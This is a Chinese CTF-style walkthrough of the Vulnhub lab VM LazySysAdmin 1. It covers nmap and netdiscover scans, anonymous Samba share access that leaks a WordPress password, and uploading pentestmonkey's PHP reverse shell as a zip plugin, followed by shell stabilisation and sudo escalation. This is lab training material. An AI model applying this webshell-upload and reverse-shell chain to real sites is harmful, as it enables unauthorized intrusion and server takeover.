Vulnhub靶机：LAZYSYSADMIN_ 1

介绍

系列：LazySysAdmin（此系列共1台）
发布日期：2017 年 9 月 20 日
难度：初级
运行环境：VMware Workstation
目标：取得Root权限
学习：

• samba敏感信息泄露
• wordpress挂马

靶机地址：https://www.vulnhub.com/entry/lazysysadmin-1,205/

信息收集

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测
发现SSH运行在777端口

nmap -p- 192.168.229.144
nmap -p 22,80,139,445,3306,6667 -A 192.168.229.144
nmap -p 22,80,139,445,3306,6667 --script=vuln 192.168.229.144

测试 samba 安全

发现了一个有只读权限的共享目录，使用空口令登录进去。结果发现了很多文件目录。

smbmap -H 192.168.229.144
smbclient //192.168.229.144/share$

使用get，把自己感兴趣的文件下载下来

通过配置文件找到一个账号密码：Admin/TogieMYSQL12345^^

此外还有一个密码：12345

登录网站

网站首页是一个静态页面，没什么有价值的信息。

简单的目录爆破，发现了wordpress：dirsearch -u http://192.168.229.144/ --full-url -x 404,403
页面上的内容一直在告诉我们，他叫togie，那接下来就试试登录吧。

访问默认后台地址：http://192.168.229.144/wordpress/wp-admin
使用Admin/TogieMYSQL12345^^登录成功

攻击者往往通过插件功能反弹shell，下面开始演示WordPress拿shell的一个流程

zip自解压拿webshell

1. 下载反弹shell的文件

https://pentestmonkey.net/tools/web-shells/php-reverse-shell

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
gunzip php-reverse-shell-1.0.tar.gz
tar xvf php-reverse-shell-1.0.tar
cp php-reverse-shell-1.0/php-reverse-shell.php ./
vim php-reverse-shell.php
zip sh.zip php-reverse-shell.php

这个文件，kali已经内置了，位于：/usr/share/webshells/php/php-reverse-shell.php

2. 编辑文件

设置反弹shell的地址和端口

编辑虚假的插件的头文件，这一步可做可不做。

3. 安装插件

显示安装成功

4. 获取shell

http://192.168.229.144/wordpress/wp-content/plugins/sh/php-reverse-shell.php

提权

首先修复一下shell：

python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color

发现可以提权到togie，然后就是sudo提权了。